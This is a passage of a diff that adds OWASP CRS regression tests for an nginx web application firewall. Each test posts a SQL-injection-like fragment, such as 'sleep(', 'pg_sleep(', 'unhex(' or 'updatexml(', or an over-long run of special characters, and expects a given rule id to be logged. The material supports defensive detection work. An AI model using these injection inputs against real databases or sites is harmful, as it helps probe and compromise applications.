text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "pay=local%28" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-58 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "pay=log%28" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-59 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "pay=log%26%26%28" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-60 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "pay=lower%28" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-61 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "pay=MAKE_SET%28" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-62 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "pay=MAX%28" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-63 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "pay=md5%28" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-64 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "pay=md5%5C%28" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-65 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "pay=MID%28" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-66 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "pay=minute+%28" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-67 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "pay=month%3D%28" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-68 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "name_const(" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-69 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "now(" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-70 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "nOW(" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-71 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "ord(" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-72 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "password?(" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-73 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "password/?(" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-74 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "Password>$(" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-75 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "pg_sleep(" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-76 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "pi(" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-77 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "PI(" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-78 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "pow(" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-79 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "POW(" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-80 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "quarter. (" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-81 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "rand(" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-82 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "Rand (" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-83 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "RAND(" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-84 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "replace(" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-85 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "REPLACE(" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-86 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "round (" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-87 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "round(" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-88 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "rtrim(" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-89 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "RTRIM(" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-90 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "pay=sin (" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-91 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "SIN(" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-92 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "pay=sleep(" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-93 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "SLEEP (" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-94 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "pay=strcmp(" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-95 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "pay=substr(" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-96 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "SUBSTR(" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-97 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "pay=substring(" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-98 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "SUBSTRING(" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-99 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "pay=sysdate(" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-100 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "time (" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-101 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "pay=time%28" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-102 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "pay=trim%28" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-103 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "pay=Uncompress+%28" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-104 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "pay=unhex%28" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-105 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "pay=uNhEx%28" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-106 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "pay=updatexml%28" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-107 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "pay=UpdateXML%28" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-108 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "pay=UPPER%28" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-109 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "pay=user+%28" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-110 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "pay=user%2F%3F%28" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-111 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "pay=user%28" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-112 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "pay=values+%28" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-113 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "pay=VALUES%28" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-114 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "pay=version%3D%28" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-115 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "pay=version%28" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-116 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "pay=xmltype%28" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-117 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "pay=XMLType%28" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-118 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "pay=year%5D%3D%28" + version: HTTP/1.0 + output: + log_contains: id "942410" diff --git a/nginx/config/owasp-crs/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942420.yaml b/nginx/config/owasp-crs/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942420.yaml new file mode 100644 index 00000000..22f57a31 --- /dev/null +++ b/nginx/config/owasp-crs/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942420.yaml @@ -0,0 +1,24 @@ +--- +meta: + author: "Christian S.J. Peron" + description: None + enabled: true + name: 942420.yaml +tests: + - test_title: 942420-1 + desc: "Restricted SQL Character Anomaly Detection (cookies): # of special characters exceeded (8)" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + Cookie: "ar=%7e%7e%7e%7e%7e%7e%7e%7e%7e&foo=var" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + version: HTTP/1.0 + output: + log_contains: id "942420" diff --git a/nginx/config/owasp-crs/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942421.yaml b/nginx/config/owasp-crs/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942421.yaml new file mode 100644 index 00000000..75ed809f --- /dev/null +++ b/nginx/config/owasp-crs/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942421.yaml @@ -0,0 +1,24 @@ +--- +meta: + author: "Christian S.J. Peron" + description: None + enabled: true + name: 942421.yaml +tests: + - test_title: 942421-1 + desc: "Restricted SQL Character Anomaly Detection (cookies): # of special characters exceeded (3)" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + Cookie: "cookie=@@@@@@@@@@@@@" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/" + version: HTTP/1.0 + output: + log_contains: id "942421" diff --git a/nginx/config/owasp-crs/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942430.yaml b/nginx/config/owasp-crs/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942430.yaml new file mode 100644 index 00000000..db33417a --- /dev/null +++ b/nginx/config/owasp-crs/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942430.yaml @@ -0,0 +1,23 @@ +--- +meta: + author: "Christian S.J. Peron" + description: None + enabled: true + name: 942430.yaml +tests: + - test_title: 942430-1 + desc: "Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (12)" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + data: "var=(((((())))))&var2=whatever" + version: HTTP/1.0 + output: + log_contains: id "942430" diff --git a/nginx/config/owasp-crs/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942431.yaml b/nginx/config/owasp-crs/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942431.yaml new file mode 100644 index 00000000..02e2cd0c --- /dev/null +++ b/nginx/config/owasp-crs/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942431.yaml @@ -0,0 +1,23 @@ +--- +meta: + author: "Christian S.J. Peron" + description: None + enabled: true + name: 942431.yaml +tests: + - test_title: 942431-1 + desc: "Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + data: "var=-------------------&var2=whatever" + version: HTTP/1.0 + output: + log_contains: id "942431" diff --git a/nginx/config/owasp-crs/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942432.yaml b/nginx/config/owasp-crs/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942432.yaml new file mode 100644 index 00000000..7ae6545a --- /dev/null +++ b/nginx/config/owasp-crs/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942432.yaml @@ -0,0 +1,23 @@ +--- +meta: + author: "Christian S.J. Peron" + description: None + enabled: true + name: 942432.yaml +tests: + - test_title: 942432-1 + desc: "Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (2)" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + data: "var=;;dd foo bar" + version: HTTP/1.0 + output: + log_contains: id "942432" diff --git a/nginx/config/owasp-crs/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942440.yaml b/nginx/config/owasp-crs/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942440.yaml new file mode 100644 index 00000000..154610ea --- /dev/null +++ 